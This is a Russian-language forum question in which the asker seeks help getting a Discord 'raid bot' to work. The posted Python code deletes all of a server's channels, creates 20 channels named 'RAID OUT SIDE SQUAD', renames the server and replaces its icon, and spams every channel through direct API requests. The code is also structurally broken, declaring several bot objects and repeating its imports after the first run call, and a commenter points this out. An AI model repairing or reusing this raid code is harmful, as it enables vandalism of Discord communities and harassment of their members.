# ДС БОТ. Работает только одна команда

Tags: python, discord.py

Делаю дискорд рейд бота, нужно чтобы при написании !spam должен быть спам сообщениями . Только когда запускаю, работает только эта команда !создатьканалы, а остальной (!изменение_сервера) не работает. Код на python. Библиотека ДИскорд

Код

```
import discord
from discord.ext import commands
import requests

client = discord.Client()
bot = commands.Bot(command_prefix="!")

@client.event
async def on_ready():
    print('Бот готов!')

@client.event
async def on_message(message):
    if message.content.startswith('!создатьканалы'):
        guild = message.guild

        # Удалить все каналы
        for channel in guild.channels:
            await channel.delete()

        # Создать 20 каналов с названием "RAID OUT SIDE SQUAD"
        for i in range(20):
            await guild.create_text_channel(name="RAID OUT SIDE SQUAD")

    if message.content.startswith('!изменение_сервера'):
        guild = message.guild
        try:
            await guild.edit(name="OUT SIDE ****!", icon="https://standoffarena.com/assets/images/users/460496.jpg?cache=1674563834")
            await message.channel.send("Название и аватарка сервера успешно изменены.")
        except discord.errors.Forbidden:
            await message.channel.send("У меня нет прав для изменения названия и аватарки сервера.")
client.run("тут токен")

import discord
from discord.ext import commands
import requests

client = discord.Client()
bot = commands.Bot(command_prefix="!")

@bot.command(name="spam")
async def spam_command(ctx):
    for channel in ctx.guild.channels:
        for i in range(20):
            data = {"content": "12"}
            headers = {"Authorization": "Bot тут токен"}
            requests.post(f"https://discord.com/api/v9/channels/{channel.id}/messages", json=data, headers=headers)
bot.run("Тут был токен")
```

Comment: У вас объект бота — это `bot` или `client`? И при этом какой из четырех? У вас в коде объявлено 4 переменные, представляющие бота. Команды вы реализуете через декоратор `@bot.command()` и обработчик или проверку вхождения подстроки в `on_message`? Для чего отправлять `POST`-запрос через `requests`, если вы используете библиотеку `discord-py`, которая предоставляет более удобный доступ к Discord API, который вы уже итак используете в `on_message`? Ну и последнее — какой логикой вы руководствуетесь, когда зачем-то повторно пишете импорты уже после запуска бота?